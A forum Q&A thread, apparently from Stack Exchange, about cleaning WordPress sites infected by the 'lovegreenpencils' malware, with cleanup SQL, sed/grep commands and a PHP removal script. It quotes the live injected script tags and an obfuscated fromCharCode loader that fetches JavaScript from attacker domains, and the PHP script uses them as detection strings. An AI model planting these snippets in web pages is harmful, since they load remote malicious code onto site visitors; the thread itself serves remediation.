Wordpress website infected by virus; how to backup or recover?

My WordPress websites are infected with malicious code. What can I do to regain data or backup? Websites are showing blank page or redirect to some malicious URL. The below code (and similar) were injected in many pages (also many files with different names were created) :

<script type='text/javascript' src='https://dock.lovegreenpencils.ga/m.js?n=nb5'></script>

 

<script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,100,111,99,107,46,108,111,118,101,103,114,101,101,110,112,101,110,99,105,108,115,46,103,97,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();</script>

Some of my infected websites (**warning**: visiting may infect) :

[To see links please register here]

[To see links please register here]

There are a few things you can do to clean your Wordpress sites:

1- Visually check your `public_html` folder where your Wordpress is installed. You may see strange filenames in your root folder as well as `wp-includes`, `wp-content` or `wp-admin` folders and subfolders.

2- Check if any code injected into `index.php` (inside root folder) and `wp-config.php`

3- Install [Wordfence][1] plugin and do a manual scan. It will go through your wordpress installation, plugins and theme files and report anything unusual.


[1]:

[To see links please register here]

4- After all these, using Chrome Developer Tools' network tab, refresh your page and check if there are connections to malicious-looking urls.

Same here - open your database in phpmyadmin and enter the following in SQL box:

UPDATE wp_posts SET post_content = REPLACE(post_content,"<script src='https://dock.lovegreenpencils.ga/m.js?n=nb5' type='text/javascript'></script>",'') WHERE post_content LIKE '%lovegreenpencils%'

It will clean all posts from the script, but you have to look where the entries come from.

Here is the script I created to clear the infected files on my sites...

Hopefully it helps. This is all I can do for you...

As mentioned you also have to remove the crap in post_content from wp_posts with the following SQL:

> UPDATE wp_posts SET post_content = REPLACE(post_content,"<script src='https://dock.lovegreenpencils.ga/m.js?n=nb5' type='text/javascript'></script>",'') WHERE post_content LIKE '%lovegreenpencils%'

and add back in your domain url in the siteurl/home option under wp_options.

Save the following code into a php file and change the settings to get it to work on your system.

<?php

error_reporting(E_ALL);
ini_set('display_errors', 1);
ini_set('memory_limit',"256M");

ob_implicit_flush(1);

ob_start();

$backup_dir = "/var/badfiles";
$html_dir = "/var/www";

if(!is_dir($backup_dir)) mkdir($backup_dir);

$dir_iterator = new RecursiveDirectoryIterator($html_dir);
$iterator = new RecursiveIteratorIterator($dir_iterator, RecursiveIteratorIterator::SELF_FIRST);

foreach ($iterator as $file) {
if($file == __FILE__) continue;

if (pathinfo($file, PATHINFO_FILENAME) == "wp-beckup") {
backup_file($file);
if(unlink($file)) {
echo "[LGP Found]: Removed and Backed Up ({$file})<br>";
}
}

if (pathinfo($file, PATHINFO_FILENAME) == "lte_") {
backup_file($file);
if(unlink($file)) {
echo "[LGP Found]: Removed and Backed Up ({$file})<br>";
}
}

$bad_text = "<script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,100,111,99,107,46,108,111,118,101,103,114,101,101,110,112,101,110,99,105,108,115,46,103,97,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();</script>";
if (pathinfo($file, PATHINFO_EXTENSION) == "php" ) {
$contents = file_get_contents($file);

if(strpos($contents, $bad_text) !== false) {

backup_file($file);

$contents = str_replace($bad_text, '', $contents);

file_put_contents($file, $contents);

echo "[LGP Found]: Code Removed and Backed Up ({$file})<br>";
}
}

if (pathinfo($file, PATHINFO_EXTENSION) == "php" || pathinfo($file, PATHINFO_EXTENSION) == "html") {
$bad_text = "<script type='text/javascript' src='https://dock.lovegreenpencils.ga/m.js?n=nb5'></script>";
$contents = file_get_contents($file);

if(strpos($contents, $bad_text) !== false) {

backup_file($file);

$contents = str_replace($bad_text, '', $contents);

file_put_contents($file, $contents);

echo "[LGP Found]: Code Removed and Backed Up ({$file})<br>";
}
}

$bad_text = "Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,100,111,99,107,46,108,111,118,101,103,114,101,101,110,112,101,110,99,105,108,115,46,103,97,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();";
if (pathinfo($file, PATHINFO_EXTENSION) == "jshintrc" || pathinfo($file, PATHINFO_EXTENSION) == "map" || pathinfo($file, PATHINFO_EXTENSION) == "jsx" || pathinfo($file, PATHINFO_EXTENSION) == "php" || pathinfo($file, PATHINFO_EXTENSION) == "js" || pathinfo($file, PATHINFO_EXTENSION) == "gz" || pathinfo($file, PATHINFO_EXTENSION) == "json") {
$contents = file_get_contents($file);

if(strpos($contents, $bad_text) !== false) {

backup_file($file);

$contents = str_replace($bad_text, '', $contents);

file_put_contents($file, $contents);

echo "[LGP Found]: Code Removed and Backed Up ({$file})<br>";
}
}






if (pathinfo($file, PATHINFO_FILENAME) == "wp-blog-header" && pathinfo($file, PATHINFO_EXTENSION) == "php") {
$contents = file_get_contents($file);

if(strpos($contents, 'MDIzMjU4YmJlYjdjZTk1NWE2OTBkY2EwNTZiZTg4NWQ=') !== false) {
backup_file($file);

$contents = substr($contents, strpos($contents, "cGFnZV9ub3RfZm91bmRfNDA0")+32);

file_put_contents($file, $contents);
echo "[VCD Found]: Code Removed and Backed Up ({$file})<br>";
}
}

}

function backup_file($file) {
global $backup_dir;

$contents = file_get_contents($file);
if(!is_dir(dirname($backup_dir.$file))) {
mkdir(dirname($backup_dir.$file),0777,true);
}
file_put_contents($backup_dir.$file, $contents);
}

DON'T FORGET TO BACKUP!!

I have faced this issue with more than 5 WordPress websites,

I fixed it by replacing all `dock.lovegreenpencils.ga` links with "#" to make it point to nowhere.

1 **. Run this command inside your WordPress directory**

grep -r "lovegreenpencils" .

You should be able to see all files that are infected:
[![enter image description here][1]][1]


2. **Replace all links using this command**


```
find . -name "*.php" |xargs sed -i "s/https:\/\/dock.lovegreenpencils.ga\/m.js?n=ns1/#/g"
```



It will replace all matched scripts with "#"

3. **Clean any script added to your WP content**
```
UPDATE wp_posts SET post_content = REPLACE(post_content,"<script src='https://dock.lovegreenpencils.ga/m.js?n=nb5' type='text/javascript'></script>",'') WHERE post_content LIKE '%lovegreenpencils%'
```
> Links could end with `m.js?n=nb5` or `m.js?n=ns1` don't forget to remove both.


## UPDATE:

THIS Milcouse code Also generates the script URLs from `charCode` In order not to be searchable.

String.fromCharCode(104,116,116,112,115,58,47,47,100,111,99,107,46,108,111,118,101,103,114,101,101,110,112,101,110,99,105,108,115,46,103,97,47,109,46,106,115)

Make sure to get rid of it as well.

[![Generating URL fro charcode][2]][2]


[1]:

[2]:

The above steps brought my website back to work.

I encountered this malware and wrote a script to clean it. Here's the link to that:

Please note, this malware also spreads itself to the DB. To clean the DB, the regex is at the top of the file. Or you can just run: `perl -pi.bak -e "s/<script[\s\S]*?>[\s\S]*?<\/script>//g" infected_db.sql`

Also, If you get to know of any other URLs that it is maliciously injecting, please let me know, I'll update the script to include that.

Regards

in my case, it was had lots of code I have copied all code from post_content column from `wp_post` or `your table name` and replace with all.

UPDATE wplm_posts SET post_content = REPLACE(post_content,"{{{WITHOUT BRACKET -- Your code here that is in Column Post_content}}}",'') WHERE post_content LIKE '%lovegreenpencils%'


in my case my code in `post_content` column was:

<script src='https://port.lovegreenpencils.ga/m.js?n=ns1' type='text/javascript'></script><script src='https://trend.linetoadsactive.com/m.js?n=ns1' type='text/javascript'></script><script src='https://start.transandfiestas.ga/m.js?n=ns1' type='text/javascript'></script>



This code is worked to me.

UPDATE wplm_posts SET post_content = REPLACE(post_content,"<script src='https://port.lovegreenpencils.ga/m.js?n=ns1' type='text/javascript'></script><script src='https://trend.linetoadsactive.com/m.js?n=ns1' type='text/javascript'></script><script src='https://start.transandfiestas.ga/m.js?n=ns1' type='text/javascript'></script>",'') WHERE post_content LIKE '%lovegreenpencils%'